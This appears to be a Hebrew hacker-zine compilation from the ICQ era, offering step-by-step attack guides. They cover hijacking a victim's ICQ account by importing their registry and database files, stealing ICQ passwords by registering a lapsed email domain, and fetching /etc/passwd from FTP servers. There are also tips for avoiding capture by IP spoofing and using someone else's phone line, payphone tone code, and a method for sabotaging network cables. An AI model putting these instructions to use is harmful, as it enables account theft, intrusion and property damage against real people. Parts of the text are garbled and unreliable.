[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\randomgroups\randomgroup4]
name"="students""number"=dword:00000004"version"=dword:00000004"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\randomgroups\randomgroup5]
name"="20 something""number"=dword:00000006"version"=dword:00000006"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\randomgroups\randomgroup6]
name"="30 something""number"=dword:00000007"version"=dword:00000007"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\randomgroups\randomgroup7]
name"="40 something""number"=dword:00000008"version"=dword:00000008"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\randomgroups\randomgroup8]

name"="50 plus""number"=dword:00000009"version"=dword:00000009"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\servers]
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\servers\server1]
host"="icq1.mirabilis.com""port"=dword:00000fa0"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals]
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\canasta]
":type"="command""command line"="/ip "
"path"="c:\\program files\\canasta\\canasta.exe"
url"="http://ourworld.compuserve.com/homepages/mharte""version"=dword:0000000f"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\connectix videophone]
"type"="extension""format"="/p:tcp /ac:""extension"="cvp"
url"="http://www.connectix.com/html/videophone.html""version"=dword:00000009"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\cu-seeme]
"type"="command""command line"="""path"="c:\\cuseeme\\cuseem32.exe"
url"="http://www.cu-seeme.com/""version"=dword:00000006"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\iris phone]
"/type"="extension""format"="""extension"="iru""url"="http://irisphone.com"
version"=dword:0000000a"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\microsoft vchat]
"type"="serverextension""format"="1.1\\n-u 1 -a ""extension"="vce"
"numparameters"=dword:00000002"server1"="vchat1.microsoft.com"
url"="http://vchat1.microsoft.com""version"=dword:00000011"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\microsoft vchat\param1]
"paramname"="world""canotherchange"="no""param1"="#compass""param2"="#bugworld"
"param3"="#fishbowl""param4"="#lodge""param5"="#lunar""param6"="#lodge"
"param7"="#practice""param8"="#redden""param9"="#tabletop"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\microsoft vchat\param2]
"paramname"="avatar""canotherchange"="yes""param1"="amani""param2"="anderson"
"param3"="brb""param4"="cat""param5"="crab""param6"="dancer""param7"="dred"
"param8"="duggan""param9"="joey""param10"="lulu"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\netscape cooltalk]
""="type"="command""command line"
"path"="c:\\program files\\netscape\\navigator\\cooltalk\\cooltalk.exe"
"
url"="http://home.netscape.com/comprod/products/navigator/version_3.0/communication/cooltalk/index.ht
"ml
version"=dword:00000004"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\rikken on the rockx]
"type"="clientserver""client command line"="/client %i"
"server command line"="/server""client path"="c:\\rikken\\rikken.exe"
"/server path"="c:\\rikken\\rikken.exe""url"="http://www.dse.nl/~ramon/rikken"
version"=dword:00000017"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\vdophone]
"type"="extension""format"="callto://""extension"="vdp"
url"="http://www.vdo.net/download/""version"=dword:00000003"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\vidcall]
"type"="command""command line"="""path"="c:\\vidcall\\corp.exe"
"url"="http://www.access.digex.net/~vidcall/vidcall.html"
version"=dword:00000008"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\webphone]
"/type"="extension""format"="""extension"="wpc""url"="http://www.webphone.com"
version"=dword:00000007"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\quake]
"type"="clientserver""client command line"="-mpath +connect %i"
"server command line"="-mpath -listen""client path"="c:\\quake_sw\\q95.bat"
"server path"="c:\\quake_sw\\q95.bat""server1"="quake.xmisson.com"
url"="http://www.idsoftware.com""version"=dword:00000010"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\voxchat]
"type"="servercommand""format"="groupname=i port=15000"
path"="c:\\program files\\voxchat\\voxchat.exe""numparameters"=dword:00000001"
"server1"="voxchat1.voxware.com""server2"="voxcha2.voxware.com"
"url"="http://www.voxchat.com/low/download.htm"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\voxchat\param1]
"paramname"="room""canotherchange"="no""param1"="#icq"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\phonelocations]
lastupdate"=dword:00000000"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\main]
selectedcell"=dword:00000000"alwaysontop"="yes""leftbarwidth"=dword:000000ad"
rightbarwidth"=dword:000000ad"floatbar-left"=dword:00000255"

floatbar-right"=dword:00000307"floatbar-top"=dword:00000033"
"floatbar-bottom"=dword:000001f3"state"="floating""minimized"="no"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\windows]
response"=dword:008f00c9"searchwiz"=dword:006f00c0"notifywiz"=dword:006f00c0"
posnovice"=dword:009300dc"posmotd"=dword:00af00b7"posmenuconfig"=dword:00a900e7"
removeuin"=dword:00bb0108"message"=dword:008b004f"security"=dword:007400b4"
prefs"=dword:007f00ae"history"=dword:0096003a"file request"=dword:009000f0"
filetransfer"=dword:009700ae"info"=dword:009300d2"fetchuser"=dword:00e9010e"
url message"=dword:00a00069"away"=dword:00bd00f7"chat request"=dword:009f00dd"
contacts list"=dword:008300bd"chat"=dword:008b00f5"phone"=dword:000a000a"
phone call request"=dword:007700e5"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\search]
place"=dword:00a400cc"type"=dword:00000002"width"=dword:01880188"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\icq chat]
chatstyle counter"=dword:00000003"pen color"=dword:0080ffff"
"back color"=dword:00004000"send focus"="yes""enable sounds"="yes"
"name bars"="yes""always on top"="no""autocolor"="no""override format"="yes"
"show toolbar"="yes""state"=dword:00010000"new font name"="times new roman"
char set"=dword:00000000"irclistwidth"=dword:00000006"
font pitch"=dword:00000012"new font height"=dword:0000000e"
font effects"=dword:00000000"autocolor 0"=dword:00000000"
autocolor 1"=dword:00000080"autocolor 2"=dword:00008000"
autocolor 3"=dword:00008080"autocolor 4"=dword:00800000"
autocolor 5"=dword:00800080"autocolor 6"=dword:00808000"
autocolor 7"=dword:00808080"autocolor 8"=dword:00c0c0c0"
autocolor 9"=dword:000000ff"autocolor 10"=dword:0000ff00"
autocolor 11"=dword:0000ffff"autocolor 12"=dword:00ff0000"
autocolor 13"=dword:00ff00ff"autocolor 14"=dword:00ffff00"
autocolor 15"=dword:00ffffff"place-left"=dword:0000000a"
place-right"=dword:000001fe"place-top"=dword:0000000a"
"place-bottom"=dword:0000021a"new logfile name"="icqchatlog.txt"
"new savefile name"="icqchatsave.txt"

[credit abt the reg key to http://i.am/devil crew]
.reg ‫ שמרו את הקובץ כקובץ‬.3
.‫**** אם יש לכם תוכנת איסיקיו פתוחה סגרו אותה‬
db - ‫) לתיקית ה‬idx,dat( ‫ העתיקו את הקבצים שהשגתם בהתחלה‬.4
)ex. c:\progra~1\icq\db( .‫של האיסיקיו שלכם‬
! ‫ הקישו כן‬...‫בלהבלה‬..‫ זה ישאל אתכם אם ברצונכם‬.‫ שכתבתם זה עתה‬reg ‫הריצו את הקובץ‬.5
‫ דרך התפריט של האיסיקיו בתפריט ההתחלה(או דרך התיקיה‬dbconvert - ‫ הריצו את תוכנת ה‬.6
.)‫עצמה‬
"convert a old db" : ‫לחצו על‬
‫זה יתחיל לחסל את המנוי הישן ואמור לפתוח אוטומטית את האיסיקיו עם המשתמש החדש‬
.)‫(הקורבן‬
.‫ פתחו זאת בעצמכם‬, ‫אם זה לא נתפח לבד‬
: ‫אם זה לא עובד עדיין על המספר של הקורבן שלכם עשו זאת‬
."click icq menu, click on "add/change current user", then click on "change the active user
.choose the uin of the victim
: ‫ למה זה קורה אתם שואלים ? יש שתי סיבות עיקריות‬,‫זה יכול לבקש ממכם סיסמא‬
.‫ הופעלה הגנת קראקים על המספר שאתם מתלבשים עליו אז תשכחו מלגלות עליו דברים‬.‫א‬
! .‫היא‬/‫ ואז אתם בעצם הוא‬.‫ליין‬-‫ המספר נמצא אוןליין אז אתם צריכים לחכות עד שהוא יהיה אוף‬.‫ב‬
! ‫בהצלחה‬
.‫ על הניסוח של התוסף‬rul3r ‫ ותודה ל‬.‫ חבר קרוב ועוזר לארגון‬- the-mod ‫תוסף ע"י‬
:‫השגת סיסמאות של מספרי איסיקיו‬
‫ בשביל להשיג‬icq ‫מאיל שלו כתובת שלא קיימת‬-‫מה צריך ? צריך רק למצוא משתמש שכתב באי‬
‫מספר ב‬
:‫לדוגמא‬
:‫אם מישהו רשם למשל‬

‫‪asdf@asdf.com‬‬
‫נכנסים לאחד מהאתרים שמביאים לרשום דומינים בחינם והם מביאים גם אי‪-‬מאיל‬
‫( ‪) www.namedemo.com / www.namezero.com‬‬
‫ושם רושמים את הכתובת‬
‫‪asdf.com‬‬
‫אחרי שרושמים את הכתובת הזאת‬
‫פותחים חשבון דואר באתר שבו רשמתם את הדומין‬
‫ושהדואר שאתם פותחים יהיה‬
‫‪asdf@asdf.com‬‬
‫אחרי שפותחים את כתובת הדואר‬
‫נכנסים לאתר ‪www.icq.com/password :‬‬
‫של מי שבחרתם ‪-icq‬ושם כותבים את מספר ה‬
‫אם עשיתם את כל השלבים נכון‬
‫הסיסמא של המספר תשלח לדואר שלכם‬
‫( ‪) asdf@asdf.com‬‬
‫הצעות‪ :‬כדאי לקחת מספר שהוא גם מספר הטלפון\האישי שלך שיהיה קל לזכור‬
‫נכתב ע"י ‪ , the-mod‬נוסח ע"י ‪ rul3r‬ונכנס כתוסף לטקסט של ‪.pirs[i]ng‬‬
‫בקשות או כל דבר אחר ל ‪ the -mod‬לשלוח ל‪:‬‬
‫‪themod@hotmail.co.il‬‬
‫‪by the-mod‬‬

‫מה היא פריצה ‪ +‬דוגמה‬
‫מה במדריך זה‪:‬‬
‫* מה זה פריצה ? ולמה ?‬
‫* איך להיזהר בזמן הפריצה ?‬
‫* ‪proxy‬‬
‫* הסבר על פריצה אתרי אף‪.‬טי‪.‬פי והוצאת קובץ סיסמאות‪.‬‬
‫* מאגרי מידע מומלצים‪.‬‬
‫מה זה פריצה ? ולמה ?‬
‫פריצה בעברית נכונה היא כניסה‪/‬לגנוב גישה למקום שאין לך גישה לשם‪.‬‬
‫להיכנס למקום‪/‬אזור‪/‬מערכת‪/‬רשת שאתה לא מורשה להיות שם‪,‬‬
‫אבל אתה בכל זאת אתה נכנס ע"י פריצה למקום‪/‬אזור‪/‬מערכת‪/‬רשת‪.‬‬
‫פריצה היא לא חוקית גם במחשבים וגם בחיים האמיתיים‪ ,‬ויש מדינות שעושות סיפור ממש גדול‬
‫מזה‪.‬‬
‫למשל בישראל אתה לא כל כך חוטף על הראש עם תופסים אותך אבל אם בבריטניה אתה נתפס‪,‬‬
‫אתה מקבל עונש כמו טרוריסט‪ ,‬למרות שכולם יודעים שזה לא אותו דבר אבל ככה הם ה"חיים"‪.‬‬
‫פריצה בכלליות היא חילול הקוד שמנהל מקום‪/‬אזור‪/‬מערכת‪/‬רשת קבע ואף לפעמים שינוי הקוד‪.‬‬
‫באקדור הוא נושא אהוב על האקרים והוא משמש ועוזר להאקר לחדור למקום‪/‬אזור‪/‬מערכת‪/‬רשת‪.‬‬
‫שורות קוד שמישהו הכניס במכוון כדי לאפשר לעצמו (בד"כ) גישה למשהו על מחשב אחר יותר‬
‫בקלות‪..‬‬
‫לדוגמא קוד שיפתח פורט מסויים רק לאי פי מסויים ויתן לו לכתוב שם פקודות קבועות שיבצעו‬
‫פעולה כלשהי לפי מה שמכין הבאקדור קבע‪.‬‬
‫לפעמים האקרים אשר מצאו את הבאקדור מנצלים את זה ומכינים כמה נוספים‬
‫כדי שהפריצה הבאה למערכת תהיה פשוטה יותר‪.‬‬
‫למה פורצים אתם רוצים לדעת ?‬
‫אני חושב שיש שתי קטגוריות לרצון של אנשים לפרוץ‪.‬‬
‫א‪ .‬האקר "טוב" ‪ -‬האקר טוב לא יפרוץ למקום‪/‬אזור‪/‬מערכת‪/‬רשת כדי להרוס או לשים את החותמת‬
‫שלו‪,‬‬
‫לשים את השם שלו ולצפות שיראו בחדשות שהוא פרץ וצריך לפחד ממנו כו'‪ ,‬הוא לא יפרוץ בשביל‬
‫מטרה רעה‪.‬‬
‫הוא יפרוץ‪ ,‬אם בכלל למקום‪/‬אזור‪/‬מערכת‪/‬רשת כדי להראות למנהל הרשתת שיש לו בעיה איפשהו‪.‬‬
‫ישאיר חותמת ולא ימחק את הלוגים או יהרוס משהו‪ .‬המטרה שלו היא לעשות טוב !!!‬
‫ה זה מתחלק לשני חלקים‪:‬‬
‫‪ .1‬מנהל הרשת יודה להאקר שהודיע לו על הבעיה ואף אולי יצ'פר אותו איכשהו‪.‬‬
‫‪ .2‬מנהל הרשת לא יקבל את כטובה וידווח עליו לרשויות ומשם זה מתפצת לעוד שני חלקים (תסתכלו‬
‫יותר למטה)‪.‬‬
‫ב‪ .‬האקר "רע" ‪ -‬הוא ההפך המושלם (או שלא) מההאקר הטוב‪ ,‬הוא יפרוץ למקום‪/‬אזור‪/‬מערכת‪/‬רשת‬
‫כדי‪,‬‬
‫להשליט טרור (קצת מוגזם) ולהרוס את מה שהוא הגיע אליו‪.‬‬
‫הוא ישאיר חותמת שהוא הרס את זה בגלל שבלה בלה‪ ,‬ובלה בלה‪.‬‬
‫קרוב לוודאי שהוא יהרוס את כל הקבצים במערכת וימחק את הלוגים (‪.)logs‬‬
‫הוא לא יעשה שום דבר טוב אלא רק יעשה את זממו‪ ,‬שהוא דבר רע‪.‬‬
‫מפה העניין מת[צל לשני חלקים‪.‬‬
‫‪ .1‬יתפסו אותו ‪ ,‬יקנסו אותו‪ ,‬יהיה משפט‪ ,‬הוא יקבל עונש‪ ,‬לא יגע במחשב ‪ 20‬שנה וימות מזקנה‪.‬‬
‫‪ .2‬לא יתפסו אותו‪ ,‬לא יקנסו אותו‪ ,‬לא יהיה משפט‪ ,‬הוא לא יענש‪ ,‬הוא יהרוס עוד אתר ומשם זה‬
‫ממשיך‪.‬‬
‫אולי יתפסו ואולי לא‪ .‬העונש על פריצה הוא תמיד כבד ‪ ,‬אבל יש מדינות שהוא יותר מדי כבר‪.‬‬
‫תודה ל‪... -‬‬
‫איך להיזהר בזמן הפריצה ?‬

‫קודם כל הכי חשוב‪ ,‬בכלל לא כדאי לפרוץ אלא אם אתם בטוחים שאתם יודעים איך להיזהר‪.‬‬
‫הנה פה כמה שיטות נחמדות להגן על עצמכם‪.‬‬
‫יש כאלה אנשים שאומרים לא לפרוץ מהבית‪ ,‬ויש כאלה שאומרים לחייג *‪ 43‬שלא יאתרו מאיפה אתה‬
‫מתקשר‪.‬‬
‫כל אלה נכונים במקצת‪.‬‬
‫& לידע אישי‪ 43* ,‬לא חוסם את השיחה אלא מונע *‪ .42‬במכשירי שיחה מזוהה רגילים זה מונע את‬
‫הצגת המספר‪,‬‬
‫אבל בחברות אינטרנט וכל מה שיש לו ציוד רציני זה ימנע *‪ 42‬ולא יותר‪.‬‬
‫השיטה הכי טובה לא להיתפס‪ ,‬היא לא לעשות את זה אבל אם בכל מקרה אתם רוצים אז הנה‪:‬‬
‫‪ .1‬תנסו להסוות את האיפי ‪ /‬הוסט ‪ /‬סבנט מסק שלכם‪.‬‬
‫אם אתם יכולים אפילו את המספר טלפון שעליו אתם מתחברים לאינטרנט ‪ ,‬לא דרך *‪ 43‬אלא דרכים‬
‫אחרות אם אתם מכירים‪.‬‬
‫‪ .2‬תתחברו דרך כמה שיותר תחנות שידור כדי שיהיה קשה להגיע אליכם‪ proxy( .‬וכו')‪.‬‬
‫‪ .3‬עשו ספופ ממש חזק לאיפי שלכם שגם עוד שנה לא יגיעו אליו‪.‬‬
‫‪ .4‬תנסו לא לפרוץ מהבית כי זה באמת עוזר אבל זה תלוי‪ ,‬אם יש לכם מקום שאתם יכולים להיות שם‬
‫הרבה זמן‪,‬‬
‫ולא יחדשו בכם או לא יגיעו אליכם לאחר המעשה‪ ,‬אז לכו על זה‪.‬‬
‫‪ .5‬כמו כן השיטה לדעתי הכי טובה ‪ ,‬היא להתחבר לקו טלפון של מישהו ומשם להתחבר לאינטרנט‬
‫ולעשות את זממכם‪.‬‬
‫לעוד מידע איך לעשות על זה לכו לטקסטי הפריקינג שלנו וחפשו מידע ברחבי הרשת ‪.‬‬
‫‪.proxy‬‬
‫שרת המוקם על ידי ספקי שירות (חברות אינטרנט‪ ,‬חברות גדולות וכו') למען לקוחותיו ותפקידו‬
‫ליצור‬
‫קשר עם מחשבים ברשת ולשלוף מהם מידע על פי בקשת הגולשים‪ .‬לשרת הפרוקסי חיבור מהיר‬
‫הרבה יותר‬
‫משל הגולש הממצוע עם המודם ולכן משמש כמקום מהיר בהרבה לקבלת קבצים ממנו‪.‬‬
‫אם הרבה אנשים מבקשים את אותו קובץ ‪ -‬הקובץ נשמר בשרת הפרוקסי‪ ,‬ובכך חוסך לגולשים את‬
‫ההמתנה‬
‫לקבלת המידע משרת האינטרנט המרוחק‪ .‬על שרתי פרוקסי יש גם הגנה ולכן הם יכולים לשמש‬
‫כפיירוול‪.‬‬
‫ככה כל העניין הזה עובד‪:‬‬
‫‪| | pc-modem | -----> | proxy | -----> | site‬‬

‫הסבר על פריצה אתרי אף‪.‬טי‪.‬פי והוצאת קובץ סיסמאות‪.‬‬
‫מהו בעצם אף‪.‬טי‪.‬פי (‪? )ftp‬‬
‫‪ ,ftp - file transport protocol‬הוא פרוטוקול אשר משמש אותנו ואת אחרים להעברת קבצים‬
‫באינטרנט‪.‬‬
‫כדי לגשת לאתר אף‪.‬טי‪.‬פי של מישהו צריך שם משתמש וסיסמא‪ ,‬אפשר גם להיכנס כאנונימי ‪ ,‬אורח‪.‬‬
‫אבל אם אתה נכנס כאורח קרוב לוודאי שתמיד תוכל רק לצפות שמה שיש וכל מה שיש באתר‪,‬‬
‫הופך להיות למצב "קריאה בלבד"‪ .‬אי אפשר להוריד את זה למחשבך האישי‪.‬‬
‫עכשיו יש לכם פה הסבר על פריצה לאתר אף‪.‬טי‪.‬פי והוצאת קובץ הסיסמאות של האתר‪ ,‬ואז‪,‬‬

‫אפשר לגשת לאתר אף‪.‬טי‪.‬פי ללא ידיעתו של האדמין כי הוא לא יודע שיש לך את הסיסמא‪.‬‬
‫אוקי הנה השיטה רק‪ ,‬תזהרו במה שאתם עושים אם זה‪.‬‬
‫‪ .1‬לכו ותפתחו לכם חלון דוס‪ ,‬פרומט דוס (‪.)dos promt‬‬
‫‪ .2‬הקישו את הרצף הבא‪:‬‬
‫‪ftp ftp.server-to-hack.com‬‬
‫‪ .3‬עכשיו אתה אמורים להקיש שם משתמש‪ ,‬נכון ? אל תקישו כלום‪ ,‬לחצו על אנטר (‪.)enter‬‬
‫‪ .4‬עכשיו אתה אמורים להקיש סיסמא‪ ,‬נכון ? אל תקישו כלום‪ ,‬לחצו על אנטר (‪.)enter‬‬
‫‪ .5‬הקישו את הרצף הבא‪.quote user ftp :‬‬
‫‪ .6‬עכשיו את זה‪.quote cwd ~root :‬‬
‫‪ .7‬ועכשיו את זה‪( .quote pass ftp :‬בלי הנקודה ובלי הנקודתיים)‪.‬‬
‫‪ .8‬עכשיו אתם מחוברים‪ ,‬הקישו את זה ‪.cd etc :‬‬
‫‪ .9‬עכשיו אתם בתיקיה ‪ ,etc‬הקישו ‪.get passwd :‬‬
‫אם עשיתם הכל נכון אז הקובץ של הסיסמאות אמור לרדת לכונן הקשיח שלכם ומשם אתם לבד‪.‬‬
‫אם הוא מוצפן בדרך כלשהי‪ ,‬נסו לעשות אם זה משהו‪,‬‬
‫תחשבו אלי איך לפצח אותו או תורידו תוכנות שתעשה את זה (לא חסר תוכנות כאלה)‪.‬‬
‫ואם הקובץ לא מוצפ אז זה חסך לכם עבודה ! ועבודה רבה !‬
‫משם תעשו מה שאתם רוצים אם מה שאתם מוצאים‪.‬‬
‫&&& כל מה שאתם מקישים‪ ,‬הקישו בלי הנקודה ובלי הנקודתיים‪.‬‬
‫&&&& הערה חשובה !!!! זה לא יעבוד על כל האתרים וכל כל המערכות‪.‬‬
‫אז אם זה לא עובד לכם ‪ ,‬אל תבואו בטענות אלי !‬
‫אני אישית יודע שזה עובד על אתרים מסוימים‪.‬‬
‫‪by pirs[i]ng‬‬

‫יצירת טונים בשפת ‪c‬‬
‫תוכן העניינים‬
‫‪------------‬‬‫‪ .1‬טונים‬
‫‪ .2‬מבט ראשוני‬
‫‪ .3‬מבט שני‬
‫‪ .4‬פקודות‬
‫‪ .5‬ערבוב טונים‬
‫‪ .1‬טונים‬
‫טונים הוא בעצם צליל‪ ,‬או סדרה של תווים‪ ,‬אשר רצית בתדירות מסויימת ‪.‬‬
‫טון מסוים ואני משמיע אותו בטלפון ציבורי מסוים זה עושה משהו ‪...‬‬
‫יש המון טונים ‪ :‬לניתוק הטלפון ‪ ,‬לקופסאות וכ'ו ‪...‬‬
‫‪ .2‬מבט ראשוני‬
‫‪>include<stdio.h#‬‬
‫‪>include<dos.h#‬‬
‫‪)(void main‬‬
‫}‬
‫‪;)sound)1800‬‬
‫‪;)delay)1000‬‬
‫‪;)(nosound‬‬
‫{‬
‫‪ .3‬מבט שני‬
‫מה בעצם כל זה עושה ?‬
‫התוכנה מפעילה טון ‪1800‬‬
‫לשנייה ‪ ,‬ואז מפסיקה אותו ‪...‬‬
‫‪>include<stdio.h#‬‬
‫‪/* )(include<dos.h> /* for delay#‬‬
‫‪)(void main‬‬
‫}‬
‫‪/* sound)1800(; /* sound of 1800mhz‬‬
‫‪/* delay)1000(; /* for sec‬‬
‫‪/* nosound)(; /* stop the sound‬‬
‫{‬

‫‪ .4‬פקודות‬
‫‪--------‬‬‫‪ - ;)*(sound .1‬ה * מסמן את הצליל בתדירות שאתה רוצה‬
‫‪ - ;)*(dealy .2‬ה * מסמן את הזמן שאתה רוצה לחכות במילי שניות‬
‫‪ - ;)(nosound .3‬מפסיק את הצליל‬
‫‪ .5‬ערבוב טונים‬
‫‪-------------‬‬‫אם אתם רוצים לערבב טונים אז ככה צריכה להיות התוכנה‬
‫‪>include<stdio.h#‬‬
‫‪>include<dos.h#‬‬
‫‪)(void main‬‬
‫}‬
‫‪;)sound)1000‬‬
‫‪;)sound)200‬‬
‫‪;)delay)1000‬‬
‫‪;)(nosound‬‬
‫{‬
‫מה שקורה פה ‪ ,‬התוכנה מפעיל שני צלילים אחד בתדירות ‪ , 1000‬והשני‬
‫בתדירות ‪ . 2000‬אז היא מחכה ‪ 1000‬מילי שניות שזה שנייה אחת ‪ ,‬ואז מפסיקה‬
‫את הצלילים ‪ .‬זה הכל ‪...‬‬
‫אתם יכולים לערבב המון צלילים ביחד ‪ ,‬אבל לא יצא מזה משהו מועיל ‪.‬‬
‫‪by boba smith‬‬
‫תיקונים ‪efraim abramov‬‬

‫כבלים‬
‫איזה סוגים יש ומה צריך לדעת עליהם ! ‪pir[s]ing /‬‬
‫כל סוגי הכבלים מתחלקים לשלוש חלוקות עיקריות‪.‬‬
‫• כבלים שזורים‬
‫• כבל קוקסיאלי‬
‫• סיב אופטי‬
‫כבל זוג שזור‪)utp( .‬‬
‫ישנם שני סוגים ‪:‬‬
‫מסוכך ולא מסוכך‪.‬‬
‫המסוכך (‪ )twisted pair‬הוא‪:‬שני חוטי נחושת מלופפים זה סביב זה ומבטלים הפרעות בין החוטים‪.‬‬
‫הלא מסוכך ( ‪)unshildedtwisted pair‬הוא‪:‬שני חוטי נחושת מלופפים זה סביב זה עם חוט מפריד‬
‫ביניהם ומבטלים הפרעות בין החוטים‪.‬‬
‫אין ביניהם הבדל רב אבל הם הכבלים הנפוצים ביותר לעבודה משרדית ואני בטוח שבכמה בתי ספר‬
‫משתמשים בכבלים הנ"ל‪.‬‬
‫כבלי ה‪ utp / tp -‬יוצאים מכרטיס הרשת לתקע בקיר (‪ )rj45‬אשר מועברים דרך כבל זהה לרכזת‪.‬‬
‫טבלת סיכום של ה ‪.tp / utp‬‬
‫אורך מירבי ‪)100m )328 feet -‬‬
‫מהירות ‪ 10mbps -‬בד"כ אבל יכול להיות גם ‪100‬‬
‫התקנה‪/‬תחזוקה ‪ -‬פשוטה ביותר וקלה‪.‬‬
‫הפרעות ‪ -‬רגיש במיוחד‪.‬‬
‫עלות ‪ -‬הזול ביותר ‪.‬‬
‫ישנתם כמו כן אותם גרסאות של כבלים רק כפולים‪.‬‬
‫‪.unshielded double twisted pair. / shielded double twisted pair‬‬
‫ההבדל ביניהם הוא שבכל הכפול יש ‪ 2‬ארבע חוטים אשר מלופפים לשתי קבוצות‪.‬‬
‫בכך היא מורידה את אחוז ההפרעות לאחוז פחות יותר ומשפרת את ביצועי הכבל‪.‬שוי נחושת ארוגה‬
‫בין החוט ארוגה בין החוטים למעטפת בפלסטיק‪.‬‬
‫טבלת סיכום של ה ‪.stp / sutp‬‬
‫אורך מירבי ‪)100m )328 feet -‬‬
‫מהירות ‪155mbps -‬‬
‫התקנה‪/‬תחזוקה ‪ -‬קלה אבל צריך מחברים מיוחדים‪ .‬פחות גמיש מהרגיל‪.‬‬
‫הפרעות ‪ -‬עמיד בפני הפרעות‪.‬‬
‫עלות ‪ -‬יקר מה‪ tp -‬אך זול לעומת האחרים‪.‬‬

‫כבל קוקסיאלי ‪-‬‬

‫מורכב משני כבלים אשר מופרדים ע"י שכבת בידוד(כתום)‪.‬‬
‫הליבה המרכזית היא בד"כ מספר סיבי נחושת מופרדים‪.‬‬
‫מעטפת פלסטיק לשמירה על הליבה עשוי כמו כן מסיבי נחושת מופרדים(כחול)‪.‬‬
‫הנתונים מועברים ע"י הליבה המרכזית ‪ -‬צבע כתום בתמונה‪.‬‬
‫ישנם שני סוגים של הכבל הנ"ל‪.‬‬
‫‪( with rg58 connectors.‬שקע) ‪thinnet - connected to the plug‬‬
‫‪( with rg8, rg11 connectors.‬שקע) ‪thicknet - connected to the plug‬‬
‫בכל הכבלים המוליך החיצוני הוא מוארק ומונע הפרעות וחיבול בכבל ע"י סיכוך‪.‬‬

‫טבלת סיכום ‪( thinnet / thicknet -‬קוקסיאל)‪.‬‬
‫‪thicknet‬‬
‫אורך מירבי ‪500 :‬‬
‫‪mbps‬מהירות ‪10 :‬‬
‫התקנה‪ :‬קשה‬
‫הפרעות‪ :‬נמוך מאוד‬
‫עלות‪ :‬גבוהה‬

‫‪thinnet‬‬
‫אורך מירבי ‪185:‬‬
‫‪mbps‬מהירות ‪10 :‬‬
‫התקנה‪ :‬קלה‬
‫הפרעות‪ :‬נמוך מאוד‬
‫עלות‪ :‬נמוך‬

‫כבל סיב אופטי ‪.fiber optic -‬‬
‫חיבור הרשת הטוב ביותר שקיים‪.‬‬
‫הנתונים מועברים בדרך אור ולא כאות חשמלי‪.‬‬
‫הכבל אינו רגיש להפרעות ואינו מחולל הפרעות ופגיעות בקו השידור‪.‬‬
‫הם מסוגלים להעביר כמות אדירה של מידע לעומת כבלים אחרים‪.‬‬
‫בלתי אפשר לצטט ולהפריע לכבל‪.‬‬
‫כך הנתונים עוברים בכבל כאשר כל דפנה היא כמו מן מראה‪:‬‬

‫הכבל בנוי מ ‪ input -‬ו ‪.output -‬‬
‫כאשר ה‪ output -‬שולח תגובות אור כ ‪.2mhz -‬‬
‫וה‪ input -‬שולח תגובות אור כ ‪.12mhz -‬‬
‫טבלת סיכום לכבל האופטי‪:‬‬
‫אורך מירבי ‪2000m -‬‬
‫מהירות ‪100-2000mbps -‬‬
‫התקנה‪/‬תחזוקה ‪ -‬קשה‬
‫הפרעות ‪ -‬אין ‪ ,‬לא היו ולא יהיו‪.‬‬
‫עלות ‪ -‬יקר במיוחד ‪ 7 -‬דולר למטר (נכון לשנת ‪.)2000‬‬
‫טבלת סיכום כללית ‪:‬‬
‫עלות‬
‫נמוך‬
‫נמוך‬
‫נמוך‬
‫גבוה‬
‫גבוה במיוחד‬

‫‪by pirs[i]ng‬‬

‫הפרעות‬
‫גבוה‬
‫גבוה‬
‫נמוך‬
‫נמוך מאוד‬
‫אין‬

‫התקנה‬
‫קלה‬
‫קלה‬
‫קלה‬
‫קשה‬
‫קשה מאוד‬

‫‪mbps‬‬
‫‪10-100‬‬
‫‪16-155‬‬
‫‪10‬‬
‫‪10‬‬
‫‪100-2000‬‬

‫אורך‬
‫‪100‬‬
‫‪100‬‬
‫‪185‬‬
‫‪500‬‬
‫‪1000‬‬

‫סוג כבל‬
‫‪tp/utp‬‬
‫‪stp/sutp‬‬
‫‪thinnet‬‬
‫‪thicknet‬‬
‫‪optic‬‬

‫איך להרוס סוגים שונים של כבלים‬
‫דרכים להרוס את הכבלים הנ"ל‪ :‬אני לא אפרט מה עושה מה כי זה יקח שנים פשוט אני אכתוב מה‬
‫לעשות‪ ,‬איך ולאיזה קבל‪.‬‬

‫‪ - tp / utp / stp / sutp‬אתם לוקחים קיסם ומכסים אותו בסוכר‪.‬‬
‫תוקעים אותו בתוך הכבל‪ ,‬בערך באמצע שלו‪ .‬תדאגו שהמקום שבו תקעתם את הקיסם מכוסה‬
‫הסוכר הוא קרוב לשמש‪ ,‬גלוי לשמש‪ .‬תשאירו את הכבל ככה ל ‪ 22‬שעות והוא גמור‪.‬‬

